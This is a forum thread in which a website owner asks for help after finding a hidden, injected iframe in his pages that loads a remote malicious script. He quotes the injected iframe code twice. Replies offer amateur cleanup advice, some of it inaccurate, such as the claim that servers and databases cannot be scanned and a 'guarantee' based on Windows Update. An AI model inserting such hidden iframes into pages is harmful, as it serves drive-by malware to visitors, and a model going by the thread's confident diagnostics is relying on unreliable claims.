i just removed some apparently injected code from a few pages that had a hidden iframe.

<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden">


I have also changed my FTP password.


a couple questions

1. if i remove the code from all pages on server does it mean the Trojan is gone or does it still live on the server somehow?

2. if a Trojan or bad code like what I pasted above is in 1 page can it spread to other pages by itself or is it only FTP injected once?

3. if a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post) can it become active where it is pasted?

4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect or possibly connecting to the example.ru website. So the question is, if my computer was not infected and I hit the refresh button would that infect my computer?


finally, some of these questions arsie because I dont know how far I have to go to "clean" everything. do I have to reinstall OS locally and wipe the server clean too?


Its a bit more complicated because I recently hired a Eastern European company to work on a new version of my site and I also suspect they might have somehow caused this (not intentionally....they have very high ratings on Elance anyway - FWIW). But they did access the server a couple times (and I always changed password after).

So how do i know its not me or if its them??? sorry about the confusion!

All of the things you stated are conditional.

1) Do you run your server from home?
2) Do you use the server which runs your website (Not recomended)
3) Where was the that code that was redirecting you :
a) In the file source
b) External source like a mysql database?
4) Is the iframe just on your site or is it on other sites, like when you go to google or something?

1) Do you run your server from home?

no...current is 1 and 1 hosting

2) Do you use the server which runs your website (Not recomended)

no

3) Where was the that code that was redirecting you :
a) In the file source

top of the body code:

</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">


b) External source like a mysql database?

I don't know this because I had the developer clean up the blog (the only dynamic section of site). the blog is accessible again (it wasn't last night, the page just threw php errors) --- but the dev didn't fully clean the site either. they told me that did but when i checked it today i found 1 page with the iframe still in it. that's why Im trying to do some self study.


but I will ask the dev...


4) Is the iframe just on your site or is it on other sites, like when you go to google or something?

the url is listed on MalwareURL.com as bad and it seemed to be in a few other Google results.

Its nothing to do with your server, 1and1 would have that protected.

Because you are getting redirected to the same site from other sources, its likely you have the virus. Sometimes when you have a virus like this they normally block you from using windows update, check to see if you can update, if you can't or the page just never loads/blank page its a 100% garentee you have a virus if you can go into windows update its a 90% sure your infected, but still better safe than sorry :P

I suggest scan your computer with something like
spybot search and destroy {free} or McAfee Security Center {Costs}
I have both.

Remember which ever virus scanning program you use, after the first scan has completed, restart your computer and RESCAN then restart your computer and go in the web and see if you still get the redirects.

After the scans are complete check if you still get redirected, if you do, try ComboFix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix) It is a really good program at getting rid of those pesky viruses which manage to get past your best defenses.

If you STILL get redirected (Doubt it)

Google the link you are being redirected to, normally if its a trojan/download w/e it will normally popup with "remove {virus name}" and in the description it will say something like... "I keep on getting redirected to {Insert Bad URL} when I click on a google link" and sometimes there are instructions which often suggest a combofix fix.

Quick Edit:

Forgot to mention this: Does the Developer get redirected aswell?

the things you are describing dont seem like the case here ( i have experienced what you are talking about)


this is code in my web pages on my server


it has been seen elsewhere like by 1and 1 support and the developer. accessed from (mac or pc)


bootime scan reveals nothing on my system (mac or pc) and windows updates normally.


it does try to redirect , its a hidden iframe but the page loads (but the page header/graphics is shifted down by about 2 " )

then if you try to refresh the browser, you can see it attempting to load the bad/remote url (but it dosnt fully parse the page- it just keep loading in the status bar)

here is the code

http://i31.tinypic.com/2r7ncpj.jpg

turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. they said it has been cleaned.


if anyone is following this thread it would help to get some feedback because even though I now know the source, most of my questions have not been answered. given that now Im kind of paranoid, I'd really like to know more about how these things work.

in addition to all the previous questions, how I scan my server or a database if I want to??


is it possible to scan for keywords?

http://img266.imageshack.us/img266/2255/badurl.png <-- What happened when I went to the url.

McAfee SiteAdvisor would of stopped me from going to your site xP

Anyways its hard to explain how these things work without actually knowing what type of virus it was.
If it was a trojan, what it doesn is it diguises itself as something which you may want, eg - anti virus and when you download it, it will just seem to run like a normal antivirus where it is actually infecting you.

Viruses can transfer themselves via email, attach themselves to file transfers such as when you send a file over msn.

You can't scan the server, you can't scan the database. But you can ask the host to scan your server for you as for the database i'm not sure.

But scanning for keywords in the database maybe possible to stop sql injections alone. as you can't upload an exe to the database, unless i'm wrong.